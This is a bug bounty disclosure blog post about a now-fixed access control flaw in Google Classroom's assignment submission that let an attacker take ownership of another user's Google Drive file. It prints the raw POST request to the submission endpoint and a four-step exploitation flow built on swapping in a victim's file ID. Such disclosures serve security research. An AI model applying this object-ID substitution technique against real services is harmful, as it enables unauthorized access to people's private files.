Leaking All Users Google Drive Files
Hey All!
Long time no see. I decided to make some new blog posts about some of my top Google findings I have had over the years. I am hoping to write up more of these as kind of a continuous series over the next few weeks so stay tuned.
In this new post I am writing up an interesting find I had a few years ago that allowed you to gain access to another users Google Drive files. For those that do not know Google Drive is a file sharing service where you can upload word docs, PDF files, or any file for that matter and share it with other users. If the file is private or not meant to be shared with you then you would receive an access denied error.
Today I am going to show you how it was possible to gain access to someone else's Google Drive files without being granted access to it :).
Before I begin I do want to say the issue is fixed and Google VRP gave a nice bounty for it :D.
POC:
So before I begin going over this POC I need to explain a little back ground about Google Classroom. For those that do not know Google Classroom is a offering Google gives for teachers/students to collaborate in a classroom like environment. You can find it at classroom.google.com and the way it works is teachers can post announcements, assignments, grade papers etc.
Now when a teacher posts an assignment on Google Classroom students then receive a page to submit their assignment to the teacher. This page looks like this for example:
A student would see the above page to submit an assignment to the teachers of the classroom for grading.
Now when submitting an assignment students had the ability to attach a file to the assignment. So lets say a student needed to attach a paper they wrote up for the class. They would attach their Google Drive DOC to the assignment and hit submit.
Here is where the issue now comes into play.
When a student would submit an assignment to the teacher Google Classroom had a process where it would then grant the teachers of the classroom ownership over the submitted document. This is needed because obviously the teachers would need to be able to read the document once a student submits it.
Now when a student actually added a Google Drive file to their assignment this is the API request that would run:
POST /v7/writesubmission?_reqid=4786040&rt=j HTTP/1.1
Host: classroom.google.com
f.req=[[3],[[["18537069787",["46653220298",["41400909728"]]],[["18537069787",["46653220298",["41400909728"]]],null,null,null,[[null,null,"1h8tReWm8Cp6bsv24BwMlimFrJ3w1d7sdpxYHfUr1rgw",2,"application/vnd.google-apps.ritz",null,null,null,null,null,null,null,null,null,[null,2]]],null,[],null,null,null,null,null,null,null,null,null,null,null,[],[]],[null,true],[]]],[null,true,null,true,true,null,true,true,true,null,null,null,true,null,[true],null,null,null,true,true,true,null,null,null,[[true,true]],[[true,true]]]]
If we look closely you can see this value here:
"1h8tReWm8Cp6bsv24BwMlimFrJ3w1d7sdpxYHfUr1rgw" This is the ID of the students Google Drive file for example being submitted for the assignment.
There was no proper RBAC checks going on to verify if you actually owned the Google Drive file being attached to the assignment.
So now we know we can attach any Google Drive file to our assignment but will the Google Classroom back end grant me access to the file?
During first testing it did not grant me access. As a result at the time I thought the RBAC checks were working properly and it was more just a UI thing if anything. I was not able to gain access to the Google Drive file of my other account when simply changing the ID in the above request.
The bypass?
After some further digging there was a bypass that then fully worked. If you added the person you were targeting to your Google Classroom as a student/teacher you would then fully be able to now gain full access to their Google Drive file using the above request now.
The flow here would then be:
1. Add the user you were targeting as a user to your Google Classroom and create an assignment in the Classroom.
2. Add another account as a student that you control to the classroom and sign into that account.
3. As the student account that you signed in as submit an assignment and modify this request:
POST /v7/writesubmission?_reqid=4786040&rt=j HTTP/1.1
Host: classroom.google.com
f.req=[[3],[[["18537069787",["46653220298",["41400909728"]]],[["18537069787",["46653220298",["41400909728"]]],null,null,null,[[null,null,"1h8tReWm8Cp6bsv24BwMlimFrJ3w1d7sdpxYHfUr1rgw",2,"application/vnd.google-apps.ritz"
And put the ID of the Google Drive from the users Drive you are targeting that you added to the classroom in step 1.
4. Submit the assignment and you will now be able to access their entire Google Drive file and get ownership over it.
That's it :)
Here is a video as well:
Mind the music as Google VRP likes music so I usually would add it.
If you have any questions please feel free to reach out to me on X:
Comments
Post a Comment